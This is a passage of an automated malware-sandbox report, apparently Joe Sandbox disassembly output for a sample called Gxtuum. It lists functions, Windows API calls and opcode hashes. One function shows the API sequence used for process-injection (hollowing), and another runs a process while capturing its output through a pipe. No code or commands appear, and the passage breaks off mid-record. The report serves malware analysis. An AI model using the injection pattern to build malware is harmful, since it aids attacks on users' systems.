                                                                  • Part of subcall function 000E61F0: RegQueryValueExA.KERNELBASE(455139FB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63CA
                                                                  • Part of subcall function 000E61F0: RegCloseKey.KERNELBASE(455139FB,?,?,00000000,00000001,455139FB,455139FB), ref: 000E63D6
                                                                • Sleep.KERNELBASE ref: 00101015
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQuerySleepValue
                                                                • String ID:
                                                                • API String ID: 4119054056-0
                                                                • Opcode ID: 92df1e532d06f680abefd10a2675b95587c509eaedac13c5f8e7ccfeb0b36967
                                                                • Instruction ID: 9597dec25c6ed8cec399f77afcac134df304213a6b639ab5b1359768829eeef0
                                                                • Opcode Fuzzy Hash: 92df1e532d06f680abefd10a2675b95587c509eaedac13c5f8e7ccfeb0b36967
                                                                • Instruction Fuzzy Hash: C4F0D1B5A00244ABC601BB68DD03A5E7A69AB16B20F440398E821672E2DB711A0447D3
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000E809D
                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000E80FB
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000E8114
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 000E8129
                                                                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 000E8149
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 000E818B
                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 000E81A8
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000E8261
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                                                                • String ID: $VUUU$invalid stoi argument
                                                                • API String ID: 3796053839-3954507777
                                                                • Opcode ID: 271e40cef0d32a039f90b7421aed50d83cadabdf5e6d6cee17ca78cbbde8e947
                                                                • Instruction ID: 3bcdc2808f5afaff9d46d60c7d64e03b759be57777b776006b3a493180bff5aa
                                                                • Opcode Fuzzy Hash: 271e40cef0d32a039f90b7421aed50d83cadabdf5e6d6cee17ca78cbbde8e947
                                                                • Instruction Fuzzy Hash: C6417F70644341BFD7609F61DC06F96BBE8FF88B01F004419B788E65E0DBB0A994CB96
                                                                APIs
                                                                  • Part of subcall function 001171C0: GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
                                                                  • Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263
                                                                • GetACP.KERNEL32(?,?,?,?,?,?,001155C7,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001225D7
                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001155C7,?,?,?,00000055,?,-00000050,?,?), ref: 00122602
                                                                • _wcschr.LIBVCRUNTIME ref: 00122696
                                                                • _wcschr.LIBVCRUNTIME ref: 001226A4
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00122765
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                • String ID: utf8
                                                                • API String ID: 4147378913-905460609
                                                                • Opcode ID: aa5070fd851dbc8cf2943d7bf63506050c75e2074f9d461db8f0cbe87265a34d
                                                                • Instruction ID: dba1e704da6a3f5f61790519af14a9ef81d5149eb122722f6349862a079a1af1
                                                                • Opcode Fuzzy Hash: aa5070fd851dbc8cf2943d7bf63506050c75e2074f9d461db8f0cbe87265a34d
                                                                • Instruction Fuzzy Hash: E071E572600322BBDB29AB75EC46FAF73A8EF64700F154029F905D7181FBB4E9618761
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D3B
                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00122FC0,00000002,00000000,?,?,?,00122FC0,?,00000000), ref: 00122D64
                                                                • GetACP.KERNEL32(?,?,00122FC0,?,00000000), ref: 00122D79
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
                                                                • Instruction ID: 79147b9964d36a45b27890066eb72939872cd3436922da64e5e6cf33a6a9d020
                                                                • Opcode Fuzzy Hash: 2d339a5fef67899f6208fb7ccf202bd836c8c7ed7edec042714478eab500a0d7
                                                                • Instruction Fuzzy Hash: 8A21C532600128BBD7398FA4E900BDF73A6FF50B60B5A8164E90ADB215E772DD61C750
                                                                APIs
                                                                  • Part of subcall function 001171C0: GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
                                                                  • Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263
                                                                  • Part of subcall function 001171C0: _free.LIBCMT ref: 00117222
                                                                  • Part of subcall function 001171C0: _free.LIBCMT ref: 00117258
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00122F83
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00122FCC
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00122FDB
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00123023
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00123042
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                • String ID:
                                                                • API String ID: 949163717-0
                                                                • Opcode ID: f2a5cfcce9969cd3d92990cfde818362dc2c51c29dd29654211c1068d06047c8
                                                                • Instruction ID: 06cf2b9bdd7f5b03b7123ffc4bd472728ca51fb3fd3a0752b21b399309770482
                                                                • Opcode Fuzzy Hash: f2a5cfcce9969cd3d92990cfde818362dc2c51c29dd29654211c1068d06047c8
                                                                • Instruction Fuzzy Hash: 2B51AF71A00225BFDB20EFA4ED41AFEB7B8BF18700F190429F900E7190E7B09964CB61
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0010A8A1
                                                                • IsDebuggerPresent.KERNEL32 ref: 0010A96D
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0010A98D
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0010A997
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                • String ID:
                                                                • API String ID: 254469556-0
                                                                • Opcode ID: 0e2519d75be9ce4dabfc679de6602e8af5b1c55459907b55d75747a3765c0730
                                                                • Instruction ID: 921b209c6bde3662dd67bc18a67481e3f792c1df94e1fd634f04693d8104e4df
                                                                • Opcode Fuzzy Hash: 0e2519d75be9ce4dabfc679de6602e8af5b1c55459907b55d75747a3765c0730
                                                                • Instruction Fuzzy Hash: E2312775E05318DBDB20DFA0D9897CDBBB8BF18304F1041AAE44DAB290EBB05A85CF45
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001097E3
                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001097F1
                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00109802
                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00109813
                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00109824
                                                                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00109835
                                                                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00109846
                                                                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00109857
                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00109868
                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00109879
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0010988A
                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0010989B
                                                                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001098AC
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001098BD
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001098CE
                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001098DF
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001098F0
                                                                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00109901
                                                                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00109912
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00109923
                                                                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00109934
                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00109945
                                                                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00109956
                                                                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00109967
                                                                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00109978
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00109989
                                                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0010999A
                                                                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001099AB
                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001099BC
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001099CD
                                                                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001099DE
                                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001099EF
                                                                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00109A00
                                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00109A11
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00109A22
                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00109A33
                                                                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00109A44
                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00109A55
                                                                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00109A66
                                                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00109A77
                                                                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00109A88
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                • API String ID: 667068680-295688737
                                                                • Opcode ID: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
                                                                • Instruction ID: 14dd56a4a91128b5906b7de6fe3bc2ec9e5ac023324abe6c6bb687b91c1803af
                                                                • Opcode Fuzzy Hash: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
                                                                • Instruction Fuzzy Hash: 45618AB5956360BFCB087FB5BD0EA5A3EA8BF0A746724441AF901E2974DBF441C08F64
                                                                APIs
                                                                • GetTempPathA.KERNEL32(00000080,?), ref: 000E832D
                                                                • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 000E8403
                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 000E8415
                                                                • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 000E8459
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 000E8481
                                                                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 000E848F
                                                                • WaitForSingleObject.KERNEL32(?,00000064), ref: 000E84B8
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84DA
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84FE
                                                                • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 000E8525
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E856A
                                                                • CloseHandle.KERNEL32(?), ref: 000E8581
                                                                • CloseHandle.KERNEL32(?), ref: 000E8589
                                                                • CloseHandle.KERNEL32(00000000), ref: 000E8591
                                                                • CloseHandle.KERNEL32(00000000), ref: 000E8599
                                                                • GetLastError.KERNEL32 ref: 000E85A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                                • String ID: D
                                                                • API String ID: 3215130363-2746444292
                                                                • Opcode ID: 8f2d7a1b34058070569b5584a39bca56294f8c1c7939f34368142c12425f2cd4
                                                                • Instruction ID: c26561b2ae39208339ffe200facd5424d09fb0f9e458889925e590a259393ae1
                                                                • Opcode Fuzzy Hash: 8f2d7a1b34058070569b5584a39bca56294f8c1c7939f34368142c12425f2cd4
                                                                • Instruction Fuzzy Hash: C4A18E71A40268AFEB24DF60CC46BDDB7B9AF04700F1041E5EA09B61D0DBB5AE84CF90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$___from_strstr_to_strchr
                                                                • String ID:
                                                                • API String ID: 3409252457-0
                                                                • Opcode ID: ab5cd1051db6f82740556edfd785584a1a13776e2c3b7c471fee66df5623e2bc
                                                                • Instruction ID: 5f582b872ce368bb03235f59cefe588a8e44016dd4693828437349844eaec36e
                                                                • Opcode Fuzzy Hash: ab5cd1051db6f82740556edfd785584a1a13776e2c3b7c471fee66df5623e2bc
                                                                • Instruction Fuzzy Hash: 9BD11A71D00325AFDB26AF74AC81AAE77E4EF59310F05436DF94497283EB7199A0CB90
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: b5fffb88562af4f990bf7125c4f59cfbf6a228aad7c21eff9b2312cbbead20f5
                                                                • Instruction ID: 1f3dbe7c60fb617b98a3d086d13da9e15682adaf4d3f112a03b17462bb5df430
                                                                • Opcode Fuzzy Hash: b5fffb88562af4f990bf7125c4f59cfbf6a228aad7c21eff9b2312cbbead20f5
                                                                • Instruction Fuzzy Hash: 69D18D71D003459FDB25DFA8C881BEEBBF5FF58310F144139E4A9A7292DB70A9858B60
                                                                APIs
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00148FA8,00000FA0,?,?,00109DC8), ref: 00109DF6
                                                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00109DC8), ref: 00109E01
                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00109DC8), ref: 00109E12
                                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00109E24
                                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00109E32
                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00109DC8), ref: 00109E55
                                                                • DeleteCriticalSection.KERNEL32(00148FA8,00000007,?,?,00109DC8), ref: 00109E71
                                                                • CloseHandle.KERNEL32(00000000,?,?,00109DC8), ref: 00109E81
                                                                Strings
                                                                • WakeAllConditionVariable, xrefs: 00109E2A
                                                                • SleepConditionVariableCS, xrefs: 00109E1E
                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00109DFC
                                                                • kernel32.dll, xrefs: 00109E0D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                • API String ID: 2565136772-3242537097
                                                                • Opcode ID: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
                                                                • Instruction ID: b600d90773ea8beaee927d555b28179f0e655fbb4fc11b7b06190186fc3fb330
                                                                • Opcode Fuzzy Hash: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
                                                                • Instruction Fuzzy Hash: 6001DF74645311BBDB21AB74BC19A2B3A69BF85B91B140014FC40D6AE4DFB0CC808660
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 00121B41
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E14
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E26
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E38
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E4A
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E5C
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E6E
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E80
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E92
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EA4
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EB6
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EC8
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EDA
                                                                  • Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EEC
                                                                • _free.LIBCMT ref: 00121B36
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 00121B58
                                                                • _free.LIBCMT ref: 00121B6D
                                                                • _free.LIBCMT ref: 00121B78
                                                                • _free.LIBCMT ref: 00121B9A
                                                                • _free.LIBCMT ref: 00121BAD
                                                                • _free.LIBCMT ref: 00121BBB
                                                                • _free.LIBCMT ref: 00121BC6
                                                                • _free.LIBCMT ref: 00121BFE
                                                                • _free.LIBCMT ref: 00121C05
                                                                • _free.LIBCMT ref: 00121C22
                                                                • _free.LIBCMT ref: 00121C3A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
                                                                • Instruction ID: 41af9672aae356a2cfb073c7078c1b5b747fc7a6acefbacbe4211ace791769d6
                                                                • Opcode Fuzzy Hash: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
                                                                • Instruction Fuzzy Hash: 85314C32600311AFEB35EA78EC45F96B7FAEF60350F148829E059E7151EF70E9A08724
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
